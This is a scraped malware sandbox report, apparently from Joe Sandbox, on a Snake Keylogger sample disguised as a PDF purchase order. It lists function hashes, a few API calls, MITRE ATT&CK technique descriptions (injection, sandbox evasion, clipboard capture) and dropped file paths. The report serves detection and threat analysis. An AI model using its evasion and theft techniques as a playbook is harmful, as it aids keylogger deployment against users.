Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 001521E3 Relevance: 5.2, Strings: 4, Instructions: 214COMMON

Download Yara Rule

Strings

Xiq, xrefs: 0015220E
Xiq, xrefs: 00152314
Xiq, xrefs: 00152248
Xiq, xrefs: 001522C7

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: Xiq$Xiq$Xiq$Xiq
API String ID: 0-4026295062
Opcode ID: dfe95494cfcec6c21bed5e92f9b55c0a294756fa79c58cc04b5d2b3faa287a41
Instruction ID: f134b645027c6d0d537391c8ebab17fd84614630ffb5a2e1191bafbd1dfcdac3
Opcode Fuzzy Hash: dfe95494cfcec6c21bed5e92f9b55c0a294756fa79c58cc04b5d2b3faa287a41
Instruction Fuzzy Hash: 398129BBD04618CBCB525AB888843BD7FB1FB55305FE44198C456DF346EB70D94A8B42

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00151478 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 00151557
4'eq, xrefs: 0015148B
F, xrefs: 00151510
F, xrefs: 0015153A

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 4'eq$F$F$F
API String ID: 0-3709558561
Opcode ID: ee59e61fa495bcf4e8a72adee337a380b76d596ed454d7e070ce80080b6ea511
Instruction ID: b83593c5e334afb44567ed2e121c2ffe356be08d39fda38b43d098ca14970062
Opcode Fuzzy Hash: ee59e61fa495bcf4e8a72adee337a380b76d596ed454d7e070ce80080b6ea511
Instruction Fuzzy Hash: 1E216034A04244EFCB16DFB4D4516EE77B2EF86304F1089A9D8529F286DB389E4ACF41

Function 00156088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;eq, xrefs: 00156094
\;eq, xrefs: 0015609E
\;eq, xrefs: 001560C6
\;eq, xrefs: 001560BA

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: \;eq$\;eq$\;eq$\;eq
API String ID: 0-3455962030
Opcode ID: 392696097174a6024b7cc346063f1a25f8f8dca0f84ec838e581043dc4590dd7
Instruction ID: a4ff370bd603951b3770862ca9c3fc4216415d031e727c604dce8c1cdbe06373
Opcode Fuzzy Hash: 392696097174a6024b7cc346063f1a25f8f8dca0f84ec838e581043dc4590dd7
Instruction Fuzzy Hash: 45015E31710014CF8B648A2DC44492A77A6AF98762765426AF921CF2E4EB71DC4587D0

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LPO-9180155-PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Forbundsstater.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

C:\Users\user\AppData\Local\Temp\Forbundsstater.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3szxrvmo.slg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrh50yc4.rav.psm1

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Hithermost.Hyp87

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt

C:\Users\user\AppData\Local\Temp\nsl302C.tmp

Static File Info

Windows Analysis Report
LPO-9180155-PDF.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre